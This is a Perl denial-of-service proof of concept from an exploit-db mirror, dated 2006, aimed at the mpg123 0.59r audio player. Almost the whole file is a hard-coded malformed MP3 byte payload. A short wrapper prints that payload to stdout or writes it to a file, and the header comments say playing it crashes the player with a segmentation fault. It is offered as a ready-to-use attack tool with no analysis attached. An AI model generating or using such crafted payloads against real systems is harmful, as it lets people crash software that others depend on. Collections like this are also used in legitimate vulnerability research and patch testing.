exploit-db-mirror/platforms/linux/dos/1634.pl

#!/usr/bin/perl
#
# Affected product: mpg123-0.59r - http://mpg123.de
#
# I'm not sure what kind of vulnerability is it, but the program
# receives a SIGSEGV when I play it. My gdb skillz r p00r, but
# anybody with more experience than me can find the *real* bug.
#
# $./mpg1DoS3 0 | mpg123 -
# (- switch tells mpg123 to play from stdin)
# $./mpg1DoS3 1 evil.mp3
# $mpg123 ./evil.mp3
#
# Regards.
# Nitrous
# Vulnfact Security Group - http://www.vulnfact.com

my $evilsong =
"\xff\xf2\xc5\x53\xff\xff\xa1\xe2\x41\x41\xad\x9b\xfb\x3f".
"\xdc\xe0\x38\x4c\x7f\xff\x6f\xe7\x0c\x0f\xc3\x3f\x7f\xef".
"\x9a\xa8\x3e\x00\xaa\xe6\x82\xc3\xe8\x65\x7f\xf1\x39\x25".
"\x24\xec\x43\xe6\x12\x44\xb9\xd5\x7a\x2a\x26\xce\xff\xeb".
"\xea\xc7\x2c\xde\x9b\xee\xba\x5a\xe7\x0b\x9d\x14\xef\xe7".
"\x6b\xf5\xa2\xb0\x5c\x4b\x23\xff\xff\xe4\xc2\x53\xff\xff".
"\xad\x21\x27\x0d\x84\xd2\x7d\x1e\xad\x5e\x96\x62\x54\x32".
"\x85\x89\x24\x93\xed\xf3\xac\xd4\x94\xea\x58\x54\xca\x29".
"\x1d\x7d\x7e\xd3\x34\x7e\xb4\x44\x24\x6a\x25\xde\xff\xed".
"\x57\x9d\x2e\x94\xcb\xe3\xd5\x48\x96\x74\x5b\xf7\xd6\x74".
"\x84\xfc\x9a\xc0\x79\x75\x7a\x1e\x31\x1f\x9f\x9f\x11\x94".
"\xd1\x2c\x48\xfe\x5d\x58\xd1\x9f\x2b\x25\x2a\xff\xff\xd0".
"\x15\x48\x1f\xff\xfe\x83\x21\xcf\xff\xff\x52\x61\x18\x6a".
"\xdf\xff\xfa\x90\x11\x01\x59\x37\xfd\x13\xf5\x3c\x7e\x58".
"\x71\xe8\x67\xd1\x0e\xcd\xee\x80\xb4\x35\x2a\x4b\x4f\xff".
"\xf8\xb0\x03\x82\x1c\xf3\x87\x5f\x6e\xf9\x9a\xdc\x5e\x49".
"\x51\xc6\xe0\x15\x04\xca\x49\x14\x0d\x90\x25\x0a\x54\x04".
"\x3c\xc0\x57\x3c\x8a\x7a\x56\x1c\x42\xf2\x47\x47\xb0\x1c".
"\x67\xff\xff\xac\xc1\x17\xff\xff\xea\x19\x89\x63\x4f\xff".
"\xf5\x2e\x91\x04\x59\x93\x93\xff\xf7\xd5\xb9\x28\x46\x20".
"\x9e\xd5\xef\xad\x6d\xb6\x98\x6c\x96\xac\xf3\xd6\x8e\xdc".
"\xc1\x5a\x1a\x8d\x02\x67\x1e\xc3\xc9\xfe\xbf\xfe\x89\xc1".
"\xf4\x79\x98\x4e\x33\x8b\xc8\x00\x41\x54\x94\x8c\x06\xc2".
"\x69\x58\x8a\x04\xc1\x76\x2f\x67\x6c\x09\x0e\xff\xfb\x92".
"\x60\xb9\x00\x02\x6d\x67\x56\xe1\xe7\x3b\x68\x63\x2c\xea".
"\xdd\x60\xed\x6d\x0a\x65\x9d\x5d\x87\xb5\x4d\xa1\x71\x2f".
"\xab\x74\xf5\x35\xb4\xd4\xce\xb6\x76\x7f\x73\x44\x16\xb5".
"\x35\x01\x59\xbf\xff\xfa\x01\xa4\xd7\xff\xff\xe7\x96\x7f".
"\xff\xfe\xa5\x89\x85\xbf\xff\xff\x3c\x7c\x21\x1f\xff\x7f".
"\xf3\x4f\x63\x3f\x6e\x3f\x9a\x9b\x9a\x54\x1d\x02\x52\x32".
"\xec\x7e\xad\xd3\xfd\x09\x82\xd8\x82\x38\xb8\xa0\xde\xf6".
"\xd3\xde\x23\xa0\x0a\x51\xb8\xc0\x61\xc6\xe5\x20\x02\x48".
"\x51\x9c\xa7\x94\xd7\xda\xfc\x4e\x7a\xea\x0b\x19\x84\xd6".
"\xca\x8d\x01\xbb\x5f\xab\xff\xf2\xa1\xe6\x7f\xff\xff\xa8".
"\xc8\x4b\x0b\x1b\xff\xf7\x5a\xa8\x0c\x18\x54\x44\x45\xbf".
"\xff\xe8\x06\x81\x81\x37\x45\x5f\xf4\x3d\xf8\x37\x0d\x12".
"\x47\xff\x32\x6f\xcc\x87\xa2\x49";

sub usage
{
	print "###################################################\n";
	print "####        mpg123 DoS Proof of Concept        ####\n";
	print "###### nitrous<at>conthackto<dot>com<dot>mx  ######\n";
	print "###################################################\n\n";
	print "Usage: $0 <mode> [evil.mp3]\n";
	print "\tmodes: [0 (stdout) | 1 (file)]\n";
	exit;
}

if(@ARGV < 1){
	usage;
}

if($ARGV[0] == 0){
	print $evilsong;
}
elsif($ARGV[0] == 1){
	if(!$ARGV[1]){
		print "Filename required !\n\n";
		usage;
	}

	open(EV1L, ">$ARGV[1]") or die "Cannot create \"$ARGV[1]\"\n";

	print EV1L $evilsong;

	close(EV1L);

	print "Ready !\nNow just type \$mpg123 $ARGV[1]\n";
}
else{
	print "Invalid Mode !\n\n";
	usage;
}

# milw0rm.com [2006-04-02]